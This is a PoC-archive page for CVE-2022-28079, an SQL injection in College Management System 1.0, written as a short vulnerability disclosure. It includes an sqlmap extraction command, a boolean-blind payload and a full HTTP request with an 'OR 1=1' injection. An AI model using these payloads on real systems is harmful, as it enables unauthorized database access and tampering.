Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2022-28079 PoC — College Management System SQL注入漏洞

Source
Associated Vulnerability
Title:College Management System SQL注入漏洞 (CVE-2022-28079)
Description:College Management System是Code Projects组织的一个简单的项目。用于记录学生、教师、科目、日程安排和所有与大学相关的事情。 College Management System v1.0 存在安全漏洞,攻击者利用该漏洞可以破坏应用程序、访问或修改数据。
Description
CVE-2022-28079
Readme
# College Management System - 'course_code' SQL Injection (Authenticated)

1. Description:
----------------------

College Management System 1.0 allows SQL Injection via parameter 'course_code' in
/College-Management-System/admin/asign-single-student-subjects.php. Exploiting this issue could allow an attacker to compromise
the application, access or modify data, or exploit latent vulnerabilities
in the underlying database.


2. Proof of Concept:
----------------------

In Burpsuite intercept the request from the affected page with
'course_code' parameter and save it like poc.req. Then run SQLmap to extract the
data from the database:

sqlmap -r poc.req --dbms=mysql


3. Example payload:
----------------------

boolean-based blind
Payload: submit=Press&roll_no=3&course_code=-6093' OR 2121=2121 AND 'ddQQ'='ddQQ


4. Burpsuite request:
----------------------

POST /College-Management-System/admin/asign-single-student-subjects.php HTTP/1.1<br>
Host: localhost<br>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8<br>
Accept-Encoding: gzip, deflate<br>
Accept-Language: en-us,en;q=0.5<br>
Cache-Control: no-cache<br>
Content-Length: 80<br>
Content-Type: application/x-www-form-urlencoded<br>
Cookie: PHPSESSID=jhnlvntmv8q4gtgsof9l1f1hhe<br>
Referer: http://localhost/College-Management-System/admin/asign-single-student-subjects.php<br>
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36<br>
<br>
submit=Press&roll_no=3&course_code=Select+Course%27+OR+1%3d1+OR+%27ns%27%3d%27ns
File Snapshot

[4.0K] /data/pocs/4b7cb6265249b4203a81d651dcbb1a64a98cb1ce └── [1.6K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.